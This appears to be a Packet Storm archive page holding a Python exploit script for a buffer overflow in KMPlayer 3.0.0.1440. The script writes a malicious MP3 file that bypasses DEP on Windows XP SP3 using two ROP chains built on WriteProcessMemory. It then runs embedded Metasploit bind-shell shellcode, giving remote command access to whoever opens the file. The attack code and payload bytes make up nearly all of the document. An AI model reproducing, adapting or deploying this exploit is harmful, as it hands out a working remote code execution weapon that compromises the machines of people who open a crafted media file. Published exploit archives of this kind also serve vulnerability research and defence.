what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

KMPlayer 3.0.0.1440 Buffer Overflow

KMPlayer 3.0.0.1440 Buffer Overflow
Posted Jun 7, 2011
Authored by dookie, ronin

KMPlayer version 3.0.0.1440 buffer overflow exploit with DEP bypass that creates a malicious mp3 file.

tags | exploit, overflow
SHA-256 | 132a8a91ab46b94954a941964bc52cf820ea67a4c8ae0be94d92b5e07513bded

KMPlayer 3.0.0.1440 Buffer Overflow

Change Mirror Download
#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.

import os

evilfile = "km_pwn.mp3"

head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"

cruft = "\x85" * 3162
nops = "\x90" * 28
nops += "\x91\x90\x90\x90" # The last byte gets decremented in rop2 while pointing EAX at the shellcode
nops += "\x90" * 20

#shellcode = "\xcc" * 368 # Size of bind shell

#root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33"
"\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45"
"\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49"
"\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05"
"\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca"
"\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60"
"\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf"
"\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73"
"\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9"
"\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0"
"\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde"
"\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f"
"\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9"
"\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53"
"\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0"
"\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47"
"\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6"
"\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf"
"\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f"
"\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3"
"\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99"
"\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4"
"\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08"
"\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7")

##################### ROP Chain for VMware Workstation (Linux) and Xen #####################

eip = "\x71\x14\x40\x00" # 00401471 RETN Pivot to the stack
toesp = "\x42" * 4
wpm = "\x13\x22\x80\x7c" # 7C802213 WriteProcessMemory - XPSP3
wpm += "\x20\x1f\x45\x02" # 02451F20 in_wm.dll - Return after WPM
wpm += "\xff\xff\xff\xff" # hProcess
wpm += "\x10\x1f\x45\x02" # 02451F10 in_wm.dll - Address to Patch
wpm += "\xbe\xba\xfe\xca" # lpBuffer placeholder (Shellcode Address)
wpm += "\xce\xfa\xed\xfe" # nSize placeholder (Shellcode Size)
wpm += "\xc0\x2b\x45\x02" # 02452BC0 in_wm.dll - Pointer for Written Bytes

# Get a copy of ESP into a register
rop1 = "\x4f\x92\x71\x13" # 1371924F : {POP} # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += "\x41" * 12 # Junk to be popped into ESI, EBP, and EBX
junk = "\x61" * 52 # Junk in between our VirtualProtect parameters and the next ROP chain

# Put a copy of the saved ESP from EDI into EAX
rop2 = "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\x41" * 8 # Compensate for the RETN 8 in rop1
# Increase EAX to point at our shellcode
rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)

# Write the address of the shellcode into the lpBuffer placeholder
# First need to put EAX in a safe spot then juggle around EDI to get it to ESI
rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)
rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\xbe\x9c\xca\x76" # 76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
rop2 += "\x41" * 4 # Junk to be popped into ESI

# Get the intial ESP value back into ESI
rop2 += "\xe6\x57\x01\x15" #150157E6 : {POP} # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
rop2 += "\x41" * 8 # Junk to be popped into EBX and ECX

# Get the initial ESP value back into ESI
rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)

# Zero EAX and set it to the shellcode size (0x200)
rop2 += "\xc0\x11\x37\x02" # 023711C0 : # XOR EAX,EAX # RETN (in_mp4.dll)
rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4 # Junk to be popped into EBP
rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4 # Junk to be popped into EBP

# Write the shellcode size into the nSize placeholder
rop2 += "\x3f\xcf\x9e\x7c" # 7C9ECF3F : {POP} # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
rop2 += "\x41" * 8 # Junk to be popped into ESI and EBP

# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
rop2 += "\x41\x15\x5d\x77" # 775D1541 : # SUB EAX,4 # RETN (ole32.dll)
rop2 += "\x41" * 4
rop2 += "\x51\xeb\x43\x02" # 0243EB51 : # ADD EAX,0C # RETN (in_wm.dll)
rop2 += "\xce\x05\x42\x02" # 024205CE : {POP} # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
rop2 += "\x41" * 4 # Junk to be popped into ESI

rop2 += "\x41" * 32

############################# ROP Chain for VMware Fusion and ESXi ############################

###############################################################################################
## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
###############################################################################################
#put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
jmp_value = "\xf0\x38\x00\x00"
rop_1 = "\x46"*4
#0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) **
rop_1 += "\x2c\x80\x44\x77"
#0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) **
rop_1 += "\x75\x66\x8a\x5b"
#0x7C926021 : {POP} # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll) **
rop_1 += "\x21\x60\x92\x7c"
rop_1 += "\x50" * 8
#0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) **
rop_1 += "\x09\x15\x45\x7e"
###############################################################################################


filler_a1 = "\x41"*360


###############################################################################################
## ROP_2 = all about the shell
###############################################################################################

######### SAVING STACKPOINTERS ################################################################
#0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) **
rop_2 = "\x2c\x80\x44\x77"
#0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) **
rop_2 += "\x75\x66\x8a\x5b"
#0x5B8A9F1E : # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll) **
rop_2 += "\x1e\x9f\x8a\x5b"
rop_2 += "\x43\x43\x43\x43"

#WriteProcessMemory construct with the two placeholders we need to generate on the fly
###############################################################################################
rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
rop_2 += "\xff\xff\xff\xff" #hProcess
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address)
rop_2 += "\xce\xfa\xed\xfe" #lpBuffer placeholder (Shellcode Size)
rop_2 += "\10\x20\x98\x7c" #writeable location in ntdll
###############################################################################################

######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)###############################
#gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x44" * 40
#0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44" *32
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44"*4
#0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) **
rop_2 += "\x8d\xda\x45\x7e"
#0x77DD994E : # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll) **
rop_2 += "\x4e\x99\xdd\x77"
#0x7C910C66 : # XCHG EAX,ESI # RETN 2 (ntdll.dll) **
rop_2 += "\x66\x0c\x91\x7c"
#padding
rop_2 += "\x44" * 2
#0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) **
rop_2 += "\x8d\xda\x45\x7e"
#padding
rop_2 += "\x44"*2
#0x76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) **
rop_2 += "\xbe\x9c\xca\x76"
###############################################################################################


######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ##################################
#gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x47" *4
#0x775D156E : # PUSH EAX # POP ESI # RETN (ole32.dll) **
rop_2 += "\x6e\x15\x5d\x77"
#0x7E433785 : # XOR EAX,EAX # RETN 4 (USER32.dll) **
rop_2 += "\x85\x37\x43\x7e"
#0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*8
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*4
#0x75D0AA2E : # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll) **
rop_2 += "\x2e\xaa\xd0\x75"
###############################################################################################

###############################################################################################
######### Realigning EAX to point to WPM and setting ESP to it ################################
rop_2 += "\x50" * 4
#0x76CAF118 : # ADD EAX,0C # RETN (IMAGEHLP.dll) **
rop_2 += "\x18\xf1\xca\x76"
#0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) **
rop_2 += "\x09\x15\x45\x7e"
rop_2 += "\x43"*316
###############################################################################################

##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
#slide into the shell
nops_7 = "\x90"*56
#after the shell junk
filler_a2 = "\x42" * (3200)
###############################################################################################

############################# PUTTING IT TOGETHER #############################################
filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2
#small buffer filler
filler_b = "\x44" * (95)
#the whole shebang (ronin's version)
filler = filler_a+jmp_value+eip+rop_1+filler_b
###############################################################################################



sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler

crashy = open(evilfile,"w")
crashy.write(sploit)
crashy.close()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close